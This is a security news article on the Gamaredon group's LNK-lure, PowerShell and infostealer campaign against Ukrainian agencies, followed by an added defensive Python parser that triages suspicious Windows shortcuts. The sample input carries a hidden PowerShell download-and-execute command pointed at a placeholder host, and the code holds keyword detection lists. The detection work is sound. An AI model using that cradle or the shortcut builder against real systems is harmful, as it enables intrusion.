Russian Gamaredon Hackers Target Ukrainian Government Using Info-Stealing Malware
Security News, September 2022
An ongoing espionage campaign run by the Russia-linked Gamaredon group is targeting employees of Ukrainian government, defense, and law enforcement agencies with custom information-stealing malware.
"The adversary is using phishing documents containing lures related to the Russian invasion of Ukraine," Cisco Talos researchers Asheer Malhotra and Guilherme Venere said in a technical write-up shared with The Hacker News.
Active since 2013, Gamaredon - also known as Actinium, Armageddon, Primitive Bear, Shuckworm, and Trident Ursa - has been linked to numerous attacks aimed at Ukrainian entities in the aftermath of Russia's military invasion of Ukraine in late February 2022.
The lures are Windows shortcut (LNK) files that seemingly reference intelligence briefings on the Russian invasion of Ukraine; opening one of the shortcuts executes a PowerShell beacon script that ultimately paves the way for next-stage payloads.
These include another PowerShell script that provides persistent access to the compromised system and delivers additional malware, among it a new information stealer capable of plundering files from the machine as well as from any removable drive connected to it.
"The infostealer is a dual-purpose malware that includes capabilities for exfiltrating specific file types and deploying additional binary and script-based payloads on an infected endpoint," the researchers said, adding it may be a component of the Giddome backdoor family.
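The infection chain above starts with a shortcut whose embedded command line launches PowerShell. The following is an added example, not code from the Talos write-up or from the article: a minimal parser for the Shell Link (.lnk) binary format (MS-SHLLINK) that reads the header flags, ShowCommand and the string fields (relative target path, working directory, arguments), and a triage pass that flags the indicators a hunter looks for in a shortcut that stages a script interpreter. The shortcut bytes are constructed inline by a helper; the PowerShell arguments and the host `example.invalid` are hypothetical and are not the campaign's actual command line.

```python
import struct

# Shell Link (.lnk) header constants from MS-SHLLINK.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C

# LinkFlags bits that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

SW_SHOWMINNOACTIVE = 7  # ShowCommand that starts the target minimised, hiding a console window

# StringData fields, in the order they appear in the file.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk(data: bytes) -> dict:
    """Return flags, ShowCommand and the StringData fields of a .lnk blob.

    LinkTargetIDList and LinkInfo are skipped by their size fields; the real
    target is also encoded in the IDList, so a full tool would decode that too.
    """
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    (show_command,) = struct.unpack_from("<I", data, 0x3C)
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        (link_info_size,) = struct.unpack_from("<I", data, pos)  # size includes itself
        pos += link_info_size
    info = {"flags": flags, "show_command": show_command}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, pos)  # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            info[key] = data[pos:pos + count * 2].decode("utf-16-le")
            pos += count * 2
        else:
            info[key] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return info


INTERPRETERS = ("powershell", "pwsh", "mshta", "wscript", "cscript", "rundll32", "cmd.exe")
SUSPICIOUS_ARGS = ("-w hidden", "-windowstyle hidden", "-nop", "-ep bypass",
                   "-executionpolicy bypass", "-enc", "iex", "invoke-expression",
                   "downloadstring", "downloadfile")


def triage_lnk(data: bytes):
    """Parse a shortcut and return (fields, reasons); an empty list means nothing matched."""
    info = parse_lnk(data)
    reasons = []
    target = info.get("relative_path", "").lower()
    args = info.get("arguments", "").lower()
    for name in INTERPRETERS:
        if name in target:
            reasons.append(f"target is a script interpreter: {name}")
    for token in SUSPICIOUS_ARGS:
        if token in args:
            reasons.append(f"suspicious argument: {token}")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (window starts minimised)")
    return info, reasons


def build_lnk(relative_path: str, working_dir: str, arguments: str, show_command: int) -> bytes:
    """Construct a minimal Unicode .lnk with an empty IDList; only used to make sample input."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20,           # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,        # creation/access/write FILETIMEs
                         0, 0,           # FileSize, IconIndex
                         show_command, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\x00\x00"  # IDListSize=2: just the TerminalID
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, working_dir, arguments))
    return header + id_list + strings


# Constructed sample (hypothetical, not the campaign's shortcut): a lure that runs a hidden
# PowerShell download cradle; example.invalid is a reserved name that never resolves.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\System32",
    "-w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/beacon.ps1')\"",
    SW_SHOWMINNOACTIVE,
)
# Constructed benign shortcut for comparison.
BENIGN_LNK = build_lnk(r"..\..\Program Files\Notepad\notepad.exe", r"C:\Program Files\Notepad", "", 1)

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        fields, hits = triage_lnk(blob)
        print(label, fields["relative_path"], fields.get("arguments"))
        for hit in hits:
            print("   ", hit)
```

The parser reads only what it needs to reach the StringData and deliberately ignores ExtraData blocks at the end of the file; for a real investigation, also decode the LinkTargetIDList and the EnvironmentVariableDataBlock, since a shortcut can leave RelativePath empty and carry its target only there.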
News URL
https://thehackernews.com/2022/09/russian-gamaredon-hackers-target.html
Related news
- Pro-Ukrainian Hackers Strike Russian State TV on Putin's Birthday
- Russian Espionage Group Targets Ukrainian Military with Malware via Telegram
- Russian Hackers Exploit New NTLM Flaw to Deploy RAT Malware via Phishing Emails
- New HTML Smuggling Campaign Delivers DCRat Malware to Russian-Speaking Users
- FIN7 hackers launch deepfake nude “generator” sites to spread malware
- Microsoft and DOJ disrupt Russian FSB hackers' attack infrastructure
- 100+ domains seized to stymie Russian Star Blizzard hackers
- Ukrainian pleads guilty to operating Raccoon Stealer malware
- N. Korean Hackers Use Fake Interviews to Infect Developers with Cross-Platform Malware
- US, UK warn of Russian APT29 hackers targeting Zimbra, TeamCity servers